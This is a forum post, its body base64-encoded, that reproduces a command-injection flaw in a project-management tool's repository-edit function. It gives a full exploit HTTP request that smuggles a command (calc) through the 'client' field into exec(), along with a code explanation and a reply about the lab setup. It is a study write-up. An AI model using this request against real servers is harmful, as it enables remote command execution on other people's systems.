论坛首页 > 技术文章投稿区 > 漏洞文章

某开源项目管理软件 命令执行漏洞复现

xzz   ·   发表于 2023-08-07 22:22:32   ·   漏洞文章
PGRpdiBjbGFzcz0ibWFya2Rvd24tYm9keSBlZGl0b3JtZC1wcmV2aWV3LWNvbnRhaW5lciIgcHJldmlld2NvbnRhaW5lcj0idHJ1ZSIgc3R5bGU9InBhZGRpbmc6IDIwcHg7Ij48aDIgaWQ9ImgyLS0iPjxhIG5hbWU9IuafkOW8gOa6kOmhueebrueuoeeQhui9r+S7tiDlkb3ku6TmiafooYzmvI/mtJ7lpI3njrAiIGNsYXNzPSJyZWZlcmVuY2UtbGluayI+PC9hPjxzcGFuIGNsYXNzPSJoZWFkZXItbGluayBvY3RpY29uIG9jdGljb24tbGluayI+PC9zcGFuPuafkOW8gOa6kOmhueebrueuoeeQhui9r+S7tiDlkb3ku6TmiafooYzmvI/mtJ7lpI3njrA8L2gyPjxoMyBpZD0iaDMtdTk2NTB1NTIzNiI+PGEgbmFtZT0i6ZmQ5Yi2IiBjbGFzcz0icmVmZXJlbmNlLWxpbmsiPjwvYT48c3BhbiBjbGFzcz0iaGVhZGVyLWxpbmsgb2N0aWNvbiBvY3RpY29uLWxpbmsiPjwvc3Bhbj7pmZDliLY8L2gzPjxwPm09cmVwbyZhbXA7Zj1lZGl0JmFtcDtyZXBvSUQ9NCZhbXA7b2JqZWN0SUQ9MDxicj5TQ009U3VidmVyc2lvbiZhbXA7Y2xpZW50PeWRveS7pDwvcD4KPGgzIGlkPSJoMy11NTkwRHU3M0IwIj48YSBuYW1lPSLlpI3njrAiIGNsYXNzPSJyZWZlcmVuY2UtbGluayI+PC9hPjxzcGFuIGNsYXNzPSJoZWFkZXItbGluayBvY3RpY29uIG9jdGljb24tbGluayI+PC9zcGFuPuWkjeeOsDwvaDM+PHA+5YWI5ZyoRGV2b3Bz5Yib5bu65Luj56CB5bqTPC9wPgo8cD48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvNzcxOS8xZDNiZTQ3ZjUwZjQ3YmQ1ZTQwMTViOTQzNDQzZmJjNl82MzExNy5wbmciIGFsdD0iIj48L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC83NzE5Lzk4NDcwMWZkNzk2M2I1ZmMxMmRiYWExZWJlM2I5NmU5XzExMzkyLnBuZyIgYWx0PSIiPjxicj5TQ03nsbvlnovmlLnkuLpTdWJ2ZXJzaW9u77yMY2xpZW50PWNhbGM8L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC83NzE5Lzk3NGY1ZmQyM2QyZWEyOGE5OThiNmY2ZWFmZDExZDkwXzI1NDA3LnBuZyIgYWx0PSIiPjwvcD4KPHByZSBjbGFzcz0icHJldHR5cHJpbnQgbGluZW51bXMgcHJldHR5cHJpbnRlZCIgc3R5bGU9IiI+PG9sIGNsYXNzPSJsaW5lbnVtcyI+PGxpIGNsYXNzPSJMMCI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0icGxuIj5QT1NUIDwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4vPC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPnd3dzwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4vPC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPmluZGV4PC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPi48L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+cGhwPC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPj88L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+bTwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj49PC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPnJlcG88L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+JmFtcDs8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+YW1wPC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPjs8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+Zjwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj49PC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPmVkaXQ8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+JmFtcDs8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+YW1wPC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPjs8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+cmVwb0lEPC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPj08L3NwYW4+PHNwYW4gY2xhc3M9ImxpdCI+NDwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4mYW1wOzwvc3Bhbj48c3BhbiBjbGFzcz0icGxuIj5hbXA8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+Ozwvc3Bhbj48c3BhbiBjbGFzcz0icGxuIj5vYmplY3RJRDwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj49PC9zcGFuPjxzcGFuIGNsYXNzPSJsaXQiPjA8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+IEhUVFA8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+Lzwvc3Bhbj48c3BhbiBjbGFzcz0ibGl0Ij4xLjE8L3NwYW4+PC9jb2RlPjwvbGk+PGxpIGNsYXNzPSJMMSI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0idHlwIj5Ib3N0PC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPjo8L3NwYW4+PHNwYW4gY2xhc3M9InBsbiI+IHplbnRhbzwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4uPC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPmNvbTwvc3Bhbj48L2NvZGU+PC9saT48bGkgY2xhc3M9IkwyIj48Y29kZSBjbGFzcz0ibGFuZy1waHAiPjxzcGFuIGNsYXNzPSJ0eXAiPkNvbnRlbnQ8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+LTwvc3Bhbj48c3BhbiBjbGFzcz0idHlwIj5MZW5ndGg8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+Ojwvc3Bhbj48c3BhbiBjbGFzcz0icGxuIj4gPC9zcGFuPjxzcGFuIGNsYXNzPSJsaXQiPjE1OTwvc3Bhbj48L2NvZGU+PC9saT48bGkgY2xhc3M9IkwzIj48Y29kZSBjbGFzcz0ibGFuZy1waHAiPjxzcGFuIGNsYXNzPSJ0eXAiPkFjY2VwdDwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj46PC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPiBhcHBsaWNhdGlvbjwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4vPC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPmpzb248L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+LDwvc3Bhbj48c3BhbiBjbGFzcz0icGxuIj4gdGV4dDwvc3Bhbj48c3BhbiBjbGFzcz0icHVuIj4vPC9zcGFuPjxzcGFuIGNsYXNzPSJwbG4iPmphdmFzY3JpcHQ8L3NwYW4+PHNwYW4gY2xhc3M9InB1biI+LDwvc3Bhbj48c3BhbiBjbGFzcz0icGxuIj4gPC9zcGFuPjxzcGFuIGNsYXNzPSJwdW4iPio8L3NwYW4+PHNwYW4gY2xhc3M9ImNvbSI+Lyo7IHE9MC4wMTwvc3Bhbj48L2NvZGU+PC9saT48bGkgY2xhc3M9Ikw0Ij48Y29kZSBjbGFzcz0ibGFuZy1waHAiPjxzcGFuIGNsYXNzPSJjb20iPlgtUmVxdWVzdGVkLVdpdGg6IFhNTEh0dHBSZXF1ZXN0PC9zcGFuPjwvY29kZT48L2xpPjxsaSBjbGFzcz0iTDUiPjxjb2RlIGNsYXNzPSJsYW5nLXBocCI+PHNwYW4gY2xhc3M9ImNvbSI+VXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzk1LjAuNDYzOC42OSBTYWZhcmkvNTM3LjM2PC9zcGFuPjwvY29kZT48L2xpPjxsaSBjbGFzcz0iTDYiPjxjb2RlIGNsYXNzPSJsYW5nLXBocCI+PHNwYW4gY2xhc3M9ImNvbSI+Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTg8L3NwYW4+PC9jb2RlPjwvbGk+PGxpIGNsYXNzPSJMNyI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0iY29tIj5PcmlnaW46IGh0dHA6Ly96ZW50YW8uY29tPC9zcGFuPjwvY29kZT48L2xpPjxsaSBjbGFzcz0iTDgiPjxjb2RlIGNsYXNzPSJsYW5nLXBocCI+PHNwYW4gY2xhc3M9ImNvbSI+UmVmZXJlcjogaHR0cDovL3plbnRhby5jb20vd3d3L2luZGV4LnBocD9tPXJlcG8mYW1wO2FtcDtmPWVkaXQmYW1wO2FtcDtyZXBvSUQ9NCZhbXA7YW1wO29iamVjdElEPTA8L3NwYW4+PC9jb2RlPjwvbGk+PGxpIGNsYXNzPSJMOSI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0iY29tIj5BY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGU8L3NwYW4+PC9jb2RlPjwvbGk+PGxpIGNsYXNzPSJMMCI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0iY29tIj5BY2NlcHQtTGFuZ3VhZ2U6IHpoLUNOLHpoO3E9MC45PC9zcGFuPjwvY29kZT48L2xpPjxsaSBjbGFzcz0iTDEiPjxjb2RlIGNsYXNzPSJsYW5nLXBocCI+PHNwYW4gY2xhc3M9ImNvbSI+Q29va2llOiBsYW5nPXpoLWNuOyBkZXZpY2U9ZGVza3RvcDsgdGhlbWU9ZGVmYXVsdDsgemVudGFvc2lkPWNpaTF1M2I1cjY0MWdqcmY4bjJmOG5rZGJ2OyByZXBvQnJhbmNoPW1hc3RlcjsgcHJlUHJvZHVjdElEPTE7IHByZUJyYW5jaD0wOyBnb2JhY2s9JTdCJTIyZGV2b3BzJTIyJTNBJTIyaHR0cCUzQSU1QyUyRiU1QyUyRnplbnRhby5jb20lNUMlMkZ3d3clNUMlMkZpbmRleC5waHAlM0ZtJTNEcmVwbyUyNmYlM0Ricm93c2UlMjIlN0Q7IHRhYj1kZXZvcHM7IHdpbmRvd1dpZHRoPTEyMDE7IHdpbmRvd0hlaWdodD04ODM8L3NwYW4+PC9jb2RlPjwvbGk+PGxpIGNsYXNzPSJMMiI+PGNvZGUgY2xhc3M9ImxhbmctcGhwIj48c3BhbiBjbGFzcz0iY29tIj5Db25uZWN0aW9uOiBjbG9zZTwvc3Bhbj48L2NvZGU+PC9saT48bGkgY2xhc3M9IkwzIj48Y29kZSBjbGFzcz0ibGFuZy1waHAiPjwvY29kZT48L2xpPjxsaSBjbGFzcz0iTDQiPjxjb2RlIGNsYXNzPSJsYW5nLXBocCI+PHNwYW4gY2xhc3M9ImNvbSI+cHJvZHVjdCU1QiU1RD0xJmFtcDtwcm9qZWN0cyU1QiU1RD03JmFtcDtTQ009U3VidmVyc2lvbiZhbXA7c2VydmljZUhvc3Q9JmFtcDtuYW1lPXp6JmFtcDtwYXRoPSZhbXA7ZW5jb2Rpbmc9dXRmLTgmYW1wO2NsaWVudD1jYWxjJmFtcDthY2NvdW50PSZhbXA7cGFzc3dvcmQ9JmFtcDtlbmNyeXB0PWJhc2U2NCZhbXA7ZGVzYz0mYW1wO3VpZD02NGFmZTgyNmQ5NmY3PC9zcGFuPjwvY29kZT48L2xpPjwvb2w+PC9wcmU+CjxwPuS7o+eggTxicj5jaGVja0Nvbm5lY3Rpb248L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC83NzE5L2ZjYWJlYTQxM2MwYWFlNzQwZjMzMDQ1YTdlOWMxZDcxXzMxODg2LnBuZyIgYWx0PSIiPjxicj7ov5nph4zopoHku6Vwb3N05pa55byP5o+Q5Lqk5LiL6Z2i55qE5Y+Y6YeP77yMJHNjbT1TdWJ2ZXJzaW9u5omN5Lya6L+b5YWlaWYsJGNsaWVudOS4uuWPr+aOp+WPmOmHj++8jOaYr+imgeaJp+ihjOeahOWRveS7pO+8jOadpeiOt+WPlueoi+W6j+eahOeJiOacrOS/oeaBr+OAgjxicj5leGVjKCkg5Ye95pWw55qE56ys5LiA5Liq5Y+C5pWw5piv6KaB5omn6KGM55qE5ZG95Luk5a2X56ym5Liy77yM56ys5LqM5Liq5Y+C5pWw5piv5LiA5Liq5pWw57uE77yM55So5LqO5a2Y5YKo5ZG95Luk5omn6KGM55qE57uT5p6c77yb56ys5LiJ5Liq5Y+C5pWw5piv5LiA5Liq5pW05pWw77yM55So5LqO5oyH5a6a6L+U5Zue5YC855qE54q25oCB56CBPC9wPgo8cD48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvNzcxOS9iYmQ5OGYyMjYzNzI3OWU1OWYyOWMyOTJiZGVmNjdkYV84MzU2OS5wbmciIGFsdD0iIj48L3A+CjxwPuaWsOaJi+WFpemXqOS9nOS4uuWtpuS5oOiusOW9le+8jOWGmeeahOS4jeWkquWujOe+jui/mOivt+ingeiwhe+8gTwvcD4KPC9kaXY+
用户名金币积分时间理由
Track-魔方 100.00 0 2023-08-08 11:11:26 期待同学的更多原创文章~

打赏我,让我更有动力~

2 条回复   |  直到 2023-9-10 | 775 次浏览

Track-魔方
发表于 2023-8-8

PHA+5paH56ug5Lit55qEemVudGFvLmNvbeW6lOivpeaYr+S9oOacrOWcsOaQreW7uumdtuWcuueOr+Wig+iuvue9rueahOWfn+WQjeWQpzwvcD4=

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2025 掌控者 All Rights Reserved.